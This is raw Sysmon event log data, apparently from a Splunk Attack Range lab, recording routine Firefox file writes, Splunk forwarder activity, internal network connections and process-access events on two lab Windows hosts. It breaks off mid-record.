08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F22DD5A2F8571E2D6FA0CD4B835584DF,SHA256=900BB82E6F53890E665E85BEEA08C34A2E4DBEA6158B41FEFF159E9A15A23389,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=99E646EA4D182E8DA4DF7FFD568E9855,SHA256=45DB3325C3881E91BFFAD543C359F62C7031C635AAD766507DC6F23CF051EAAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D9A3D8489341419AF70D3C95A5A0601C,SHA256=EF6262E5FE1D480FB3FAA677DD8AE527ED9BC77FC2BB8F8724BD9A31A0C55BA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=46D914BB96ADAA692B8854E404A5A93A,SHA256=E1090A7DA879A70CDB1DBA31CF012BAF8B1662E935E28B71E090832F3AE604B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=68E4FAD9EB73B5DC7AEDB04C80EE0D8B,SHA256=20A1D11DA6F1AC05EE0F4BB93C55CB8D5FA91D0177D54E9E860EE022F4323210,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=588C830C04EC39B9E10F8EC6802668D4,SHA256=9F2A739BAD1CCD7374AB6CB8E98D2827F078AA0AB732832F58149277D2013D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.587{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=138D6E71735DF65C4327EA12FD1DB742,SHA256=799FE911B4E21988466C1A81757BDAE44ADAB3190CDDFD94A8DEFC27A82B6043,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.586{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F00DF9876EE6EECE0F8972F3392DE6E2,SHA256=1E62D0F290393B3F13ED2C430E3D7A2E52F742FEE8B19DB54480D6C9E9E944D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.004{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A014F4AC60D5C693A068E7B084E95F,SHA256=519092731D906B7E158748E4C99B008F1B5B940E54B1B66F8F202FD686F5FBCC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810613Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:15.313{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57482-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810615Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:18.242{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84634B09BCA842D8201B10979BDECF56,SHA256=C9274002FCC4BDFBAE62CD8C243AC1572E00FBC561B1CB663840FC1C8E8F1F70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:18.583{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:18.019{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84A26F352D5A76263F57D8CB4EA929F1,SHA256=E6D5399BA4C01EB0F1C144089FBB00D118A0E149744A6FE5A7D3C659BD70DE9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810616Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:19.289{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC644168FF2186B97AAA2D29C9B2BD02,SHA256=62AD113E48C2536DD436184576ECEAD15D2F8EA5EC6293C3C4288C33AE7C28E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:19.020{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDE166B1C191EFB0DBC55A08732460AB,SHA256=44BE18EC7EE0D318019A5DFE1DF21274971DDEC4755E9660DE0F4614DE6873AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.606{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61995-false10.0.1.12-8000- 23542300x8000000000000000810618Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:20.898{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810617Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:20.335{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCFDBDB39E9D02421B13C93C80212FF2,SHA256=5467693D19B29D8333CE282861806009D8D78B148338033052CB816D6656D722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:20.020{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A98C341E451D66035F9B76F67B7D94D,SHA256=AEF16F938F7166C8CEAD55542FBB381C0596A9129DA6AB5B76B3494F8268F554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810619Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:21.351{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D475537388C67370E26576829DA6E70,SHA256=951F165725EA5999E46395F808301C9E21C502CD6DFA9B3429C6ADC14122E3D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:21.022{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B301362C4A3B741809028F2D0D963EE,SHA256=8690D44F8F8F6351E4C172B17C835D61DB1FAC8C31DCCA1318FE57AA63C94D6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810622Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:21.219{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57484-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000810621Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:21.031{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57483-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000810620Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:22.351{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97AE029BD71495C2F0E39FF6A08E09DD,SHA256=F6F973694A11F3BE260897D197E8812E5A1FCB4FCD327FF6E364B6FD913B5A74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:22.036{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B4985D08DAD4326FE2797AFA0308F8A,SHA256=9B5D774DFC69833514E0E22DC4D9E61B588A515F35B9C5465DC214A635640083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810623Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:23.367{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F75B5BC0A9331550383CEE50BDD02F69,SHA256=CC14FB327BA17F2519DFCCF2963F2A09B3629C6FD36AE621267EF8C3B5C45EA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:23.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C12271B180A4BA35A56747AEED5934F,SHA256=1E6E62E9C4639856FEFD727D0A1DF3CBDDD7F76BA5BF37DAF8787C065933D5BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:23.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04D24DCB185933DFA94992E28C7F05C0,SHA256=AA53AB6D8530C3E054DEB6A95C69CA2CBDC1C2F5354AEB9E5E652A503CDA3D0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:23.051{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6433B3003E6ABC6835BDF59B3ED71393,SHA256=EB1232EFC4482256FAACF4953284610716C6C85711BA7FE8F2DAC1D6992C7015,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810637Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.368{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66B62E4BE5F3793894EC4D2FE8AF7CF9,SHA256=CBC2E6188A4E63D46D7EC1E325A338B1159C1B38E041FE10FBCD5042F8AA13B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:24.053{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4A65A322DBF578B2F3C5E0C8C2C4423,SHA256=F2398114B0DF7E47FEAB5B595F1DC7241D53D97A47F6578515490FF62C153ACE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810636Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.304{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B4-60EB-EA79-00000000D001}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810635Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810634Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810633Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810632Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810631Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810630Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810629Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810628Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810627Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810626Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F8B4-60EB-EA79-00000000D001}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810625Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program 